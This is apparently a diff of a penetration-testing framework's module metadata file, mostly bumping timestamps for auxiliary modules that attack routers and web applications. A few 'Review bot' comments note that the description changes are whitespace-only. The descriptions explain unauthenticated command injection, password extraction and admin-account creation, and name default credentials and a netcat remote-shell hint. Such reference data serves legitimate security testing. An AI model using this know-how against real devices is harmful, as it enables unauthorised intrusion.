"description": "This module exploits an OS Command Injection vulnerability in some D-Link\n Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in\n command.php, which is accessible without authentication. This module has been\n tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below.\n In order to get a remote shell the telnetd could be started without any\n authentication.",
"description": "This module exploits an OS Command Injection vulnerability in some D-Link\n Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in\n command.php, which is accessible without authentication. This module has been\n tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below.\n In order to get a remote shell the telnetd could be started without any\n authentication.",
"references": [
"OSVDB-89861",
"EDB-24453",
@@ -1517,7 +1581,7 @@
"https"
],
"targets": null,
"mod_time": "2022-01-23 15:28:32 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb",
"is_install_path": true,
"ref_name": "admin/http/dlink_dir_300_600_exec_noauth",
@@ -1567,7 +1631,7 @@
"https"
],
"targets": null,
"mod_time": "2017-10-09 17:06:05 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb",
"is_install_path": true,
"ref_name": "admin/http/dlink_dir_645_password_extractor",
@@ -1616,7 +1680,7 @@
"https"
],
"targets": null,
"mod_time": "2017-10-09 17:06:05 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb",
"is_install_path": true,
"ref_name": "admin/http/dlink_dsl320b_password_extractor",
@@ -1668,7 +1732,7 @@
"https"
],
"targets": null,
"mod_time": "2022-01-23 15:28:32 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb",
"is_install_path": true,
"ref_name": "admin/http/foreman_openstack_satellite_priv_esc",
@@ -1693,7 +1757,7 @@
"Kacper Szurek",
"Jacob Robles"
],
"description": "This modules exploits unauthenticated REST API requests in GitStack through v2.3.10.\n The module supports requests for listing users of the application and listing\n available repositories. Additionally, the module can create a user and add the user\n to the application's repositories. This module has been tested against GitStack v2.3.10.",
"description": "This modules exploits unauthenticated REST API requests in GitStack through v2.3.10.\n The module supports requests for listing users of the application and listing\n available repositories. Additionally, the module can create a user and add the user\n to the application's repositories. This module has been tested against GitStack v2.3.10.",
"references": [
"CVE-2018-5955",
"EDB-43777",
@@ -1718,7 +1782,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/gitstack_rest.rb",
"is_install_path": true,
"ref_name": "admin/http/gitstack_rest",
@@ -1843,7 +1907,7 @@
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module abuses a command execution vulnerability within the\n web based management console of the Hewlett-Packard Web JetAdmin\n network printer tool v6.2 - v6.5. It is possible to execute commands\n as SYSTEM without authentication. The vulnerability also affects POSIX\n systems, however at this stage the module only works against Windows.\n This module does not apply to HP printers.",
"description": "This module abuses a command execution vulnerability within the\n web based management console of the Hewlett-Packard Web JetAdmin\n network printer tool v6.2 - v6.5. It is possible to execute commands\n as SYSTEM without authentication. The vulnerability also affects POSIX\n systems, however at this stage the module only works against Windows.\n This module does not apply to HP printers.",
"references": [
"OSVDB-5798",
"BID-10224",
@@ -1868,7 +1932,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/hp_web_jetadmin_exec",
@@ -1919,7 +1983,7 @@
"https"
],
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/admin/http/ibm_drm_download.rb",
"is_install_path": true,
"ref_name": "admin/http/ibm_drm_download",
@@ -1927,6 +1991,16 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": false
@@ -1944,7 +2018,7 @@
"Soroush Dalili",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module bypasses basic authentication for Internet Information Services (IIS).\n By appending the NTFS stream name to the directory name in a request, it is\n possible to bypass authentication.",
"description": "This module bypasses basic authentication for Internet Information Services (IIS).\n By appending the NTFS stream name to the directory name in a request, it is\n possible to bypass authentication.",
"references": [
"CVE-2010-2731",
"OSVDB-66160",
@@ -1970,7 +2044,7 @@
"https"
],
"targets": null,
"mod_time": "2022-01-23 15:28:32 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/iis_auth_bypass.rb",
"is_install_path": true,
"ref_name": "admin/http/iis_auth_bypass",
@@ -2021,7 +2095,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/intersil_pass_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/intersil_pass_reset",
@@ -2069,7 +2143,7 @@
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb",
"is_install_path": true,
"ref_name": "admin/http/iomega_storcenterpro_sessionid",
@@ -2119,7 +2193,7 @@
"https"
],
"targets": null,
"mod_time": "2022-03-10 18:03:35 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/jboss_bshdeployer.rb",
"is_install_path": true,
"ref_name": "admin/http/jboss_bshdeployer",
@@ -2169,7 +2243,7 @@
"https"
],
"targets": null,
"mod_time": "2022-03-10 18:03:35 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb",
"is_install_path": true,
"ref_name": "admin/http/jboss_deploymentfilerepository",
@@ -2194,7 +2268,7 @@
"guerrino di massa",
"Cristiano Maruti <cmaruti@gmail.com>"
],
"description": "JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform\n 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression\n Language (EL) expressions, which allows remote attackers to execute arbitrary code\n via a crafted URL. This modules also has been tested successfully against IBM\n WebSphere 6.1 running on iSeries.\n\n NOTE: this is only a vulnerability when the Java Security Manager is not properly\n configured.",
"description": "JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform\n 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression\n Language (EL) expressions, which allows remote attackers to execute arbitrary code\n via a crafted URL. This modules also has been tested successfully against IBM\n WebSphere 6.1 running on iSeries.\n\n NOTE: this is only a vulnerability when the Java Security Manager is not properly\n configured.",
"references": [
"CVE-2010-1871",
"OSVDB-66881"
@@ -2218,7 +2292,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/jboss_seam_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/jboss_seam_exec",
@@ -2244,7 +2318,7 @@
"Filipe Reis <fr@integrity.pt>",
"Vitor Oliveira <vo@integrity.pt>"
],
"description": "This module creates an arbitrary account with administrative privileges in Joomla versions 3.4.4\n through 3.6.3. If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).",
"description": "This module creates an arbitrary account with administrative privileges in Joomla versions 3.4.4\n through 3.6.3. If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).",
"references": [
"CVE-2016-8869",
"CVE-2016-8870",
@@ -2271,7 +2345,7 @@
"https"
],
"targets": null,
"mod_time": "2021-02-17 12:33:59 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/joomla_registration_privesc.rb",
"is_install_path": true,
"ref_name": "admin/http/joomla_registration_privesc",
@@ -2295,7 +2369,7 @@
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module abuses the setAccount page on Kaseya VSA between 7 and 9.1 to create a new\n Master Administrator account. Normally this page is only accessible via the localhost\n interface, but the application does nothing to prevent this apart from attempting to\n force a redirect. This module has been tested with Kaseya VSA v7.0.0.17, v8.0.0.10 and\n v9.0.0.3.",
"description": "This module abuses the setAccount page on Kaseya VSA between 7 and 9.1 to create a new\n Master Administrator account. Normally this page is only accessible via the localhost\n interface, but the application does nothing to prevent this apart from attempting to\n force a redirect. This module has been tested with Kaseya VSA v7.0.0.17, v8.0.0.10 and\n v9.0.0.3.",
"references": [
"CVE-2015-6922",
"ZDI-15-448",
@@ -2321,7 +2395,7 @@
"https"
],
"targets": null,
"mod_time": "2022-01-13 18:47:11 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/kaseya_master_admin.rb",
"is_install_path": true,
"ref_name": "admin/http/kaseya_master_admin",
@@ -2370,7 +2444,7 @@
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb",
"is_install_path": true,
"ref_name": "admin/http/katello_satellite_priv_esc",
@@ -2395,7 +2469,7 @@
"Pichaya Morimoto",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module exploits an unauthenticated file download vulnerability\n in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded\n as a ZIP and unzipped automatically, thus binary files can be downloaded.",
"description": "This module exploits an unauthenticated file download vulnerability\n in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded\n as a ZIP and unzipped automatically, thus binary files can be downloaded.",
"references": [
"URL-https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-lime-survey/",
"URL-https://www.limesurvey.org/blog/22-security/136-limesurvey-security-advisory-10-2015",
@@ -2420,7 +2494,7 @@
"https"
],
"targets": null,
"mod_time": "2022-01-23 15:28:32 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/limesurvey_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/limesurvey_file_download",
@@ -2444,7 +2518,7 @@
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "Some Linksys Routers are vulnerable to an authenticated OS command injection.\n Default credentials for the web interface are admin/admin or admin/password. Since\n it is a blind os command injection vulnerability, there is no output for the\n executed command. A ping command against a controlled system for can be used for\n testing purposes.",
"description": "Some Linksys Routers are vulnerable to an authenticated OS command injection.\n Default credentials for the web interface are admin/admin or admin/password. Since\n it is a blind os command injection vulnerability, there is no output for the\n executed command. A ping command against a controlled system for can be used for\n testing purposes.",
"references": [
"OSVDB-89912",
"BID-57760",
@@ -2470,7 +2544,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/linksys_e1500_e2500_exec",
@@ -2495,7 +2569,7 @@
"Craig Heffner",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in the WRT120N Linksys router\n to reset the password of the management interface temporarily to an empty value.\n This module has been tested successfully on a WRT120N device with firmware version\n 1.0.07.",
"description": "This module exploits a stack-based buffer overflow vulnerability in the WRT120N Linksys router\n to reset the password of the management interface temporarily to an empty value.\n This module has been tested successfully on a WRT120N device with firmware version\n 1.0.07.",
"references": [
"EDB-31758",
"OSVDB-103521",
@@ -2520,7 +2594,7 @@
"https"
],
"targets": null,
"mod_time": "2022-01-23 15:28:32 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb",
"is_install_path": true,
"ref_name": "admin/http/linksys_tmunblock_admin_reset_bof",
@@ -2544,7 +2618,7 @@
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "Some Linksys Routers are vulnerable to OS Command injection.\n You will need credentials to the web interface to access the vulnerable part\n of the application.\n Default credentials are always a good starting point. admin/admin or admin\n and blank password could be a first try.\n Note: This is a blind OS command injection vulnerability. This means that\n you will not see any output of your command. Try a ping command to your\n local system and observe the packets with tcpdump (or equivalent) for a first test.\n\n Hint: To get a remote shell you could upload a netcat binary and exec it.\n WARNING: this module will overwrite network and DHCP configuration.",
"description": "Some Linksys Routers are vulnerable to OS Command injection.\n You will need credentials to the web interface to access the vulnerable part\n of the application.\n Default credentials are always a good starting point. admin/admin or admin\n and blank password could be a first try.\n Note: This is a blind OS command injection vulnerability. This means that\n you will not see any output of your command. Try a ping command to your\n local system and observe the packets with tcpdump (or equivalent) for a first test.\n\n Hint: To get a remote shell you could upload a netcat binary and exec it.\n WARNING: this module will overwrite network and DHCP configuration.",
"references": [
"URL-http://www.s3cur1ty.de/m1adv2013-01",
"URL-http://www.s3cur1ty.de/attacking-linksys-wrt54gl",
@@ -2571,7 +2645,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/linksys_wrt54gl_exec",
@@ -2595,7 +2669,7 @@
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an administrator account creation vulnerability in Desktop Central\n from v7 onwards by sending a crafted request to DCPluginServelet. It has been tested in\n several versions of Desktop Central (including MSP) from v7 onwards.",
"description": "This module exploits an administrator account creation vulnerability in Desktop Central\n from v7 onwards by sending a crafted request to DCPluginServelet. It has been tested in\n several versions of Desktop Central (including MSP) from v7 onwards.",
"references": [
"CVE-2014-7862",
"OSVDB-116554",
@@ -2621,7 +2695,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb",
"is_install_path": true,
"ref_name": "admin/http/manage_engine_dc_create_admin",
@@ -2645,7 +2719,7 @@
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a directory listing information disclosure vulnerability in the\n FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. It\n makes a recursive listing, so it will list the whole drive if you ask it to list / in\n Linux or C:\\ in Windows. This vulnerability is unauthenticated on OpManager and\n Applications Manager, but authenticated in IT360. This module will attempt to login\n using the default credentials for the administrator and guest accounts; alternatively\n you can provide a pre-authenticated cookie or a username / password combo. For IT360\n targets enter the RPORT of the OpManager instance (usually 8300). This module has been\n tested on both Windows and Linux with several different versions. Windows paths have to\n be escaped with 4 backslashes on the command line. There is a companion module that\n allows for arbitrary file download. This vulnerability has been fixed in Applications\n Manager v11.9 b11912 and OpManager 11.6.",
"description": "This module exploits a directory listing information disclosure vulnerability in the\n FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. It\n makes a recursive listing, so it will list the whole drive if you ask it to list / in\n Linux or C:\\ in Windows. This vulnerability is unauthenticated on OpManager and\n Applications Manager, but authenticated in IT360. This module will attempt to login\n using the default credentials for the administrator and guest accounts; alternatively\n you can provide a pre-authenticated cookie or a username / password combo. For IT360\n targets enter the RPORT of the OpManager instance (usually 8300). This module has been\n tested on both Windows and Linux with several different versions. Windows paths have to\n be escaped with 4 backslashes on the command line. There is a companion module that\n allows for arbitrary file download. This vulnerability has been fixed in Applications\n Manager v11.9 b11912 and OpManager 11.6.",
"references": [
"CVE-2014-7863",
"OSVDB-117696",
@@ -2671,7 +2745,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/manageengine_dir_listing.rb",
"is_install_path": true,
"ref_name": "admin/http/manageengine_dir_listing",
@@ -2695,7 +2769,7 @@
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an arbitrary file download vulnerability in the FailOverHelperServlet\n on ManageEngine OpManager, Applications Manager and IT360. This vulnerability is\n unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This\n module will attempt to login using the default credentials for the administrator and\n guest accounts; alternatively you can provide a pre-authenticated cookie or a username\n and password combo. For IT360 targets enter the RPORT of the OpManager instance (usually\n 8300). This module has been tested on both Windows and Linux with several different\n versions. Windows paths have to be escaped with 4 backslashes on the command line. There is\n a companion module that allows the recursive listing of any directory. This\n vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.",
"description": "This module exploits an arbitrary file download vulnerability in the FailOverHelperServlet\n on ManageEngine OpManager, Applications Manager and IT360. This vulnerability is\n unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This\n module will attempt to login using the default credentials for the administrator and\n guest accounts; alternatively you can provide a pre-authenticated cookie or a username\n and password combo. For IT360 targets enter the RPORT of the OpManager instance (usually\n 8300). This module has been tested on both Windows and Linux with several different\n versions. Windows paths have to be escaped with 4 backslashes on the command line. There is\n a companion module that allows the recursive listing of any directory. This\n vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.",
"references": [
"CVE-2014-7863",
"OSVDB-117695",
@@ -2721,7 +2795,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/manageengine_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/manageengine_file_download",
@@ -2745,7 +2819,7 @@
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection\n vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate\n privileges and obtain Super Administrator access. A Super Administrator can then\n use his privileges to dump the whole password database in CSV format. PMP can use\n both MySQL and PostgreSQL databases but this module only exploits the latter as\n MySQL does not support stacked queries with Java. PostgreSQL is the default database\n in v6.8 and above, but older PMP versions can be upgraded and continue using MySQL,\n so a higher version does not guarantee exploitability. This module has been tested\n on v6.8 to v7.1 build 7104 on both Windows and Linux. The vulnerability is fixed in\n v7.1 build 7105 and above.",
"description": "ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection\n vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate\n privileges and obtain Super Administrator access. A Super Administrator can then\n use his privileges to dump the whole password database in CSV format. PMP can use\n both MySQL and PostgreSQL databases but this module only exploits the latter as\n MySQL does not support stacked queries with Java. PostgreSQL is the default database\n in v6.8 and above, but older PMP versions can be upgraded and continue using MySQL,\n so a higher version does not guarantee exploitability. This module has been tested\n on v6.8 to v7.1 build 7104 on both Windows and Linux. The vulnerability is fixed in\n v7.1 build 7105 and above.",
"references": [
"CVE-2014-8499",
"OSVDB-114485",
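Review bot: the removed and the added `description` line for manageengine_pmp_privesc in this hunk render identically, so the recorded change to that string can only be whitespace (most likely leading-space normalisation of the continuation lines, which the later webnms hunks show explicitly). The same removed/added pair with no visible difference repeats for nearly every module in this file, so the diff carries no reviewable content change for those entries beyond the `mod_time` bump; it would help reviewers if the commit message stated that these description hunks are a regeneration after a formatting pass and not edits to module text.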
@@ -2771,7 +2845,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb",
"is_install_path": true,
"ref_name": "admin/http/manageengine_pmp_privesc",
@@ -2822,7 +2896,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/mantisbt_password_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/mantisbt_password_reset",
@@ -2846,7 +2920,7 @@
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits the EditDocument servlet from the frontend on the Mutiny 5\n appliance. The EditDocument servlet provides file operations, such as copy and\n delete, which are affected by a directory traversal vulnerability. Because of this,\n any authenticated frontend user can read and delete arbitrary files from the system\n with root privileges. In order to exploit the vulnerability a valid user (any role)\n in the web frontend is required. The module has been tested successfully on the\n Mutiny 5.0-1.07 appliance.",
"description": "This module exploits the EditDocument servlet from the frontend on the Mutiny 5\n appliance. The EditDocument servlet provides file operations, such as copy and\n delete, which are affected by a directory traversal vulnerability. Because of this,\n any authenticated frontend user can read and delete arbitrary files from the system\n with root privileges. In order to exploit the vulnerability a valid user (any role)\n in the web frontend is required. The module has been tested successfully on the\n Mutiny 5.0-1.07 appliance.",
"references": [
"CVE-2013-0136",
"US-CERT-VU-701572",
@@ -2871,7 +2945,7 @@
"https"
],
"targets": null,
"mod_time": "2022-01-23 15:28:32 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb",
"is_install_path": true,
"ref_name": "admin/http/mutiny_frontend_read_delete",
@@ -2895,7 +2969,7 @@
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an arbitrary file download vulnerability in CSVServlet\n on ManageEngine NetFlow Analyzer. This module has been tested on both Windows\n and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you\n must escape the backslash with a backslash.",
"description": "This module exploits an arbitrary file download vulnerability in CSVServlet\n on ManageEngine NetFlow Analyzer. This module has been tested on both Windows\n and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you\n must escape the backslash with a backslash.",
"references": [
"CVE-2014-5445",
"OSVDB-115340",
@@ -2921,7 +2995,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/netflow_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/netflow_file_download",
@@ -2945,7 +3019,7 @@
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n The application has a file download vulnerability that can be exploited by an\n authenticated remote attacker to download any file in the system.\n This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13.",
"description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n The application has a file download vulnerability that can be exploited by an\n authenticated remote attacker to download any file in the system.\n This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13.",
"references": [
"CVE-2016-1524",
"US-CERT-VU-777024",
@@ -2971,7 +3045,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/netgear_auth_download.rb",
"is_install_path": true,
"ref_name": "admin/http/netgear_auth_download",
@@ -3084,7 +3158,7 @@
"https"
],
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/netgear_r6700_pass_reset",
@@ -3097,6 +3171,9 @@
],
"Stability": [
"crash-service-down"
],
"Reliability": [
]
},
"session_types": false,
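Review bot: the `Reliability` key added for netgear_r6700_pass_reset is an empty array, so the notes block gains a field but no information. An empty list is the accepted way to say an auxiliary module has no session reliability to rate, but it is also exactly what an unfilled placeholder looks like; the source module should either carry a short comment confirming the omission is deliberate or list the applicable trait. Note also that this entry's `mod_time` in the preceding hunk is 2023-02-03, unlike the 2023-02-08 stamp on every other module in this region, so this change comes from a separate module edit rather than from the bulk reformat and deserves its own line in the commit message.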
@@ -3200,7 +3277,7 @@
"https"
],
"targets": null,
"mod_time": "2022-01-23 15:28:32 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb",
"is_install_path": true,
"ref_name": "admin/http/netgear_soap_password_extractor",
@@ -3224,7 +3301,7 @@
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The NETGEAR WNR2000 router has a vulnerability in the way it handles password recovery.\n This vulnerability can be exploited by an unauthenticated attacker who is able to guess\n the value of a certain timestamp which is in the configuration of the router.\n Brute forcing the timestamp token might take a few minutes, a few hours, or days, but\n it is guaranteed that it can be bruteforced.\n This module works very reliably and it has been tested with the WNR2000v5, firmware versions\n 1.0.0.34 and 1.0.0.18. It should also work with the hardware revisions v4 and v3, but this\n has not been tested.",
"description": "The NETGEAR WNR2000 router has a vulnerability in the way it handles password recovery.\n This vulnerability can be exploited by an unauthenticated attacker who is able to guess\n the value of a certain timestamp which is in the configuration of the router.\n Brute forcing the timestamp token might take a few minutes, a few hours, or days, but\n it is guaranteed that it can be bruteforced.\n This module works very reliably and it has been tested with the WNR2000v5, firmware versions\n 1.0.0.34 and 1.0.0.18. It should also work with the hardware revisions v4 and v3, but this\n has not been tested.",
"references": [
"CVE-2016-10175",
"CVE-2016-10176",
@@ -3251,7 +3328,7 @@
"https"
],
"targets": null,
"mod_time": "2022-01-23 15:28:32 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb",
"is_install_path": true,
"ref_name": "admin/http/netgear_wnr2000_pass_recovery",
@@ -3277,7 +3354,7 @@
"Drazen Popovic <drazen.popvic@infigo.hr>",
"Bojan Zdrnja <bojan.zdrnja@infigo.hr>"
],
"description": "Nexpose v5.7.2 and prior is vulnerable to a XML External Entity attack via a number\n of vectors. This vulnerability can allow an attacker to a craft special XML that\n could read arbitrary files from the filesystem. This module exploits the\n vulnerability via the XML API.",
"description": "Nexpose v5.7.2 and prior is vulnerable to a XML External Entity attack via a number\n of vectors. This vulnerability can allow an attacker to a craft special XML that\n could read arbitrary files from the filesystem. This module exploits the\n vulnerability via the XML API.",
"references": [
"URL-https://www.rapid7.com/blog/post/2013/08/16/r7-vuln-2013-07-24/"
],
@@ -3300,7 +3377,7 @@
"https"
],
"targets": null,
"mod_time": "2022-01-23 15:28:32 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb",
"is_install_path": true,
"ref_name": "admin/http/nexpose_xxe_file_read",
@@ -3325,7 +3402,7 @@
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "NFRAgent.exe in Novell File Reporter allows remote attackers to delete\n arbitrary files via a full pathname in an SRS request with OPERATION set to 4 and\n CMD set to 5 against /FSF/CMD. This module has been tested successfully on NFR\n Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1) on\n Windows platforms.",
"description": "NFRAgent.exe in Novell File Reporter allows remote attackers to delete\n arbitrary files via a full pathname in an SRS request with OPERATION set to 4 and\n CMD set to 5 against /FSF/CMD. This module has been tested successfully on NFR\n Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1) on\n Windows platforms.",
"references": [
"CVE-2011-2750",
"OSVDB-73729",
@@ -3350,7 +3427,7 @@
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb",
"is_install_path": true,
"ref_name": "admin/http/novell_file_reporter_filedelete",
@@ -3374,7 +3451,7 @@
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The NVRmini 2 Network Video Recorded and the ReadyNAS Surveillance application are vulnerable\n to an administrator password reset on the exposed web management interface.\n Note that this only works for unauthenticated attackers in earlier versions of the Nuuo firmware\n (before v1.7.6), otherwise you need an administrative user password.\n This exploit has been tested on several versions of the NVRmini 2 and the ReadyNAS Surveillance.\n It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested\n in those devices.",
"description": "The NVRmini 2 Network Video Recorded and the ReadyNAS Surveillance application are vulnerable\n to an administrator password reset on the exposed web management interface.\n Note that this only works for unauthenticated attackers in earlier versions of the Nuuo firmware\n (before v1.7.6), otherwise you need an administrative user password.\n This exploit has been tested on several versions of the NVRmini 2 and the ReadyNAS Surveillance.\n It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested\n in those devices.",
"references": [
"CVE-2016-5676",
"US-CERT-VU-856152",
@@ -3400,7 +3477,7 @@
"https"
],
"targets": null,
"mod_time": "2022-01-13 18:43:41 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/nuuo_nvrmini_reset",
@@ -3424,7 +3501,7 @@
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "The Openbravo ERP XML API expands external entities which can be defined as\n local files. This allows the user to read any files from the FS as the\n user Openbravo is running as (generally not root).\n\n This module was tested against Openbravo ERP version 3.0MP25 and 2.50MP6.",
"description": "The Openbravo ERP XML API expands external entities which can be defined as\n local files. This allows the user to read any files from the FS as the\n user Openbravo is running as (generally not root).\n\n This module was tested against Openbravo ERP version 3.0MP25 and 2.50MP6.",
"references": [
"CVE-2013-3617",
"OSVDB-99141",
@@ -3450,7 +3527,7 @@
"https"
],
"targets": null,
"mod_time": "2022-01-23 15:28:32 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
